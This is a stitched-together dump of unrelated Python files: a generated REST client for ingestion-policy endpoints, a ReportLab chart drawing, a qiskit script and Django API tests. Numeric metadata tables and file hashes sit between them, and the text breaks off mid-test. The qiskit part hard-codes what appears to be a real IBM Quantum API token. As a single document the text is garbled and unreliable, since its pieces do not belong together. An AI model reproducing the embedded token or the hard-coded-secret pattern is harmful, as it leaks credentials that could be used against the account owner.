query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ingestion_policy(self, id, **kwargs): # noqa: E501
"""Get a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingestion_policy(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
else:
data = self.get_ingestion_policy_with_http_info(id, **kwargs)  # noqa: E501
return data
def get_ingestion_policy_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingestion_policy_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_ingestion_policy`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_accounts(self, id, **kwargs): # noqa: E501
"""Remove accounts from ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_accounts(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be removed from the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_accounts_with_http_info(id, **kwargs) # noqa: E501
else:
data = self.remove_accounts_with_http_info(id, **kwargs)  # noqa: E501
return data
def remove_accounts_with_http_info(self, id, **kwargs): # noqa: E501
"""Remove accounts from ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_accounts_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be removed from the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `remove_accounts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/removeAccounts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_groups(self, id, **kwargs): # noqa: E501
"""Remove groups from the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be removed from the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_groups_with_http_info(id, **kwargs) # noqa: E501
else:
data = self.remove_groups_with_http_info(id, **kwargs)  # noqa: E501
return data
def remove_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Remove groups from the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be removed from the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `remove_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/removeGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_ingestion_policy(self, id, **kwargs): # noqa: E501
"""Update a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_ingestion_policy(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\", \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
else:
data = self.update_ingestion_policy_with_http_info(id, **kwargs)  # noqa: E501
return data
def update_ingestion_policy_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_ingestion_policy_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\", \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_ingestion_policy`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
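# --- Hedged usage sketch (illustrative; not part of the generated client) ---
# A minimal way to drive the ingestion-policy endpoints above, assuming this
# class is the swagger-generated UsageApi of the wavefront-api-client package
# (the package, class, and header names here are assumptions, not confirmed
# by this file):
import wavefront_api_client as wave

config = wave.Configuration()
config.host = 'https://YOUR_INSTANCE.wavefront.com'
config.api_key['X-AUTH-TOKEN'] = 'YOUR_API_TOKEN'
api = wave.UsageApi(wave.ApiClient(config))

# Synchronous call: returns the deserialized response container.
policies = api.get_all_ingestion_policies(offset=0, limit=100)

# Asynchronous call: returns a thread whose .get() blocks for the result.
thread = api.get_ingestion_policy('policy-id', async_req=True)
policy = thread.get()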
| 39.492596
| 409
| 0.598835
| 4,492
| 40,006
| 5.097061
| 0.050089
| 0.05311
| 0.024458
| 0.031447
| 0.949904
| 0.944313
| 0.937849
| 0.928022
| 0.928022
| 0.922213
| 0
| 0.017655
| 0.307679
| 40,006
| 1,012
| 410
| 39.531621
| 0.809005
| 0.3359
| 0
| 0.809612
| 0
| 0
| 0.174532
| 0.061263
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038817
| false
| 0
| 0.007394
| 0
| 0.103512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c4186249277a609345e8d458294613bb48d111e
| 9,403
|
py
|
Python
|
tests/charts-out/test_graphics_charts_barcharts_sampleV1.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | 1
|
2020-05-21T23:34:55.000Z
|
2020-05-21T23:34:55.000Z
|
tests/charts-out/test_graphics_charts_barcharts_sampleV1.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
tests/charts-out/test_graphics_charts_barcharts_sampleV1.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
# Autogenerated by ReportLab guiedit; do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(53.75,50,15,27.08333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(91.25,50,15,10.41667,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(128.75,50,15,41.66667,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(166.25,50,15,45.83333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(203.75,50,15,77.08333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(241.25,50,15,93.75,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(278.75,50,15,39.58333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(316.25,50,15,8.333333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(68.75,50,15,29.16667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(106.25,50,15,12.5,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(143.75,50,15,43.75,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(181.25,50,15,47.91667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(218.75,50,15,79.16667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(256.25,50,15,95.83333,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(293.75,50,15,41.66667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(331.25,50,15,10.41667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,49,350,49,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,49,50,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(87.5,49,87.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(125,49,125,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(162.5,49,162.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(200,49,200,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(237.5,49,237.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(275,49,275,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(312.5,49,312.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,49,350,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,76.75,47)
v0.add(String(-26.66,-10,'Jan-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,114.25,47)
v0.add(String(-28.33,-10,'Feb-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,151.75,47)
v0.add(String(-29.99,-10,'Mar-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,189.25,47)
v0.add(String(-28.88,-10,'Apr-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,226.75,47)
v0.add(String(-31.66,-10,'May-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,264.25,47)
v0.add(String(-27.22,-10,'Jun-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,301.75,47)
v0.add(String(-25,-10,'Jul-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,339.25,47)
v0.add(String(-30.55,-10,'Aug-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,81.25,45,81.25,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,112.5,45,112.5,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,143.75,45,143.75,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,81.25)
v0.add(String(-10,-4,'15',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,112.5)
v0.add(String(-10,-4,'30',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,143.75)
v0.add(String(-10,-4,'45',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-10,-4,'60',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
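# --- Hedged usage sketch (illustrative; not part of the autogenerated file) ---
# Besides the .save() call above, the same Drawing can be rendered directly
# with reportlab's renderers (renderPM needs the optional Pillow backend):
from reportlab.graphics import renderPDF, renderPM

d = ExplodedDrawing_Drawing()
renderPDF.drawToFile(d, 'barchart.pdf')            # vector PDF output
renderPM.drawToFile(d, 'barchart.png', fmt='PNG')  # raster PNG output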
| 110.623529
| 230
| 0.770924
| 1,575
| 9,403
| 4.581587
| 0.096508
| 0.029656
| 0.024945
| 0.050998
| 0.890244
| 0.863775
| 0.859063
| 0.857123
| 0.857123
| 0.857123
| 0
| 0.139724
| 0.030309
| 9,403
| 84
| 231
| 111.940476
| 0.651678
| 0.005956
| 0
| 0.1625
| 1
| 0
| 0.029642
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0125
| false
| 0
| 0.025
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c4992718fa73c2b787ebf3160133a632e0acfb4
| 179
|
py
|
Python
|
Python/qiskit.py
|
shujanpannag/Random_Programs
|
77b7a8197e154926411d9939ef1e4effbc6eabfe
|
[
"MIT"
] | null | null | null |
Python/qiskit.py
|
shujanpannag/Random_Programs
|
77b7a8197e154926411d9939ef1e4effbc6eabfe
|
[
"MIT"
] | null | null | null |
Python/qiskit.py
|
shujanpannag/Random_Programs
|
77b7a8197e154926411d9939ef1e4effbc6eabfe
|
[
"MIT"
] | null | null | null |
from qiskit import IBMQ
IBMQ.save_account(
'd1ab0b1d62a6816a89fdacf9ba00715446bf75f7722b7095ef28dcf749199d31e9ccd16dc0b18f65916f04abb9691b083bd4fd3cb2e5e571441dc9ed7c2c4460')
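# --- Hedged alternative (illustrative; not from the original file) ---
# Hard-coding an IBM Quantum token in source risks leaking the credential.
# A safer sketch reads it from an environment variable instead; the variable
# name IBMQ_TOKEN is an assumption chosen for this example.
import os
from qiskit import IBMQ

token = os.environ.get('IBMQ_TOKEN')
if token:
    IBMQ.save_account(token, overwrite=True)  # persists credentials locally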
| 44.75
| 135
| 0.916201
| 8
| 179
| 20.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.455621
| 0.055866
| 179
| 3
| 136
| 59.666667
| 0.508876
| 0
| 0
| 0
| 0
| 0
| 0.715084
| 0.715084
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
7c9fc9abbf0ef2c2a301585b9cbf7894d715977c
| 14,649
|
py
|
Python
|
api_v1/tests.py
|
jlin/inventory
|
c098c98e570c3bf9fadfd811eb75e1213f6ea428
|
[
"BSD-3-Clause"
] | 22
|
2015-01-16T01:36:32.000Z
|
2020-06-08T00:46:18.000Z
|
api_v1/tests.py
|
jlin/inventory
|
c098c98e570c3bf9fadfd811eb75e1213f6ea428
|
[
"BSD-3-Clause"
] | 8
|
2015-12-28T18:56:19.000Z
|
2019-04-01T17:33:48.000Z
|
api_v1/tests.py
|
jlin/inventory
|
c098c98e570c3bf9fadfd811eb75e1213f6ea428
|
[
"BSD-3-Clause"
] | 13
|
2015-01-13T20:56:22.000Z
|
2022-02-23T06:01:17.000Z
|
from django.test import TestCase
from django.test.client import Client
try:
import json
except ImportError:
from django.utils import simplejson as json
from MacroExpansion import MacroExpansion
from KeyValueTree import KeyValueTree
from truth.models import Truth, KeyValue as TruthKeyValue
class TestMacroExpansion(TestCase):
fixtures = ['testdata.json']
def test_import(self):
try:
from MacroExpansion import MacroExpansion
except ImportError:
raise ImportError('Unable to import Macro Expansion')
try:
from KeyValueTree import KeyValueTree
except ImportError:
raise ImportError('Unable to import KeyValueTree')
def test_key_value_not_found(self):
m = MacroExpansion('host:fake-hostname2:ip_address')
self.assertEqual(m.output(),'10.99.32.1')
def test_key_value_found(self):
m = MacroExpansion('host:fake-hostname2:ip_address')
self.assertEqual(m.output(),'10.99.32.1')
# TODO: Add checks for setting every property of a system through the api
class SystemApi(TestCase):
fixtures = ['testdata.json']
new_hostname = 'new_hostname999'
new_host_id = 3
def setUp(self):
self.client = Client()
def test_get_system_not_found_by_id(self):
resp = self.client.get('/api/v2/system/-1/', follow=True)
self.assertEqual(404, resp.status_code)
def test_get_system_by_id(self):
resp = self.client.get('/api/v2/system/1/', follow=True)
self.assertEqual(200, resp.status_code)
def test_get_system_by_hostname(self):
resp = self.client.get('/api/v2/system/asfdasfasfasdfasfasdfsadf/', follow=True)
self.assertEqual(404, resp.status_code)
resp = self.client.get('/api/v2/system/fake-hostname2/', follow=True)
self.assertEqual(200, resp.status_code)
def test_key_value_tree(self):
tree = KeyValueTree('fake-hostname2').final
self.assertEqual(tree['nic.0.ipv4_address.0'],'10.99.32.1')
def test_key_value_api(self):
resp = self.client.get('/api/v2/keyvalue/?keystore=fake-hostname2', follow=True)
self.assertEqual(json.loads(resp.content)['truth:test:cluster_name'], 'Test Cluster Name')
self.assertEqual(json.loads(resp.content)['host:fake-hostname1:nic.0.ipv4_address.0'], '10.99.32.3')
resp = self.client.put('/en-US/api/v2/keyvalue/5/', {'key':'nic.0.ipv4_address.0', 'value':'14.14.14.14', 'system_id':'1'})
resp = self.client.get('/api/v2/keyvalue/?keystore=fake-hostname2', follow=True)
self.assertEqual(json.loads(resp.content)['host:fake-hostname1:nic.0.ipv4_address.0'], '10.99.32.3')
resp = self.client.get('/api/v2/keyvalue/?key=cluster_owner', follow=True)
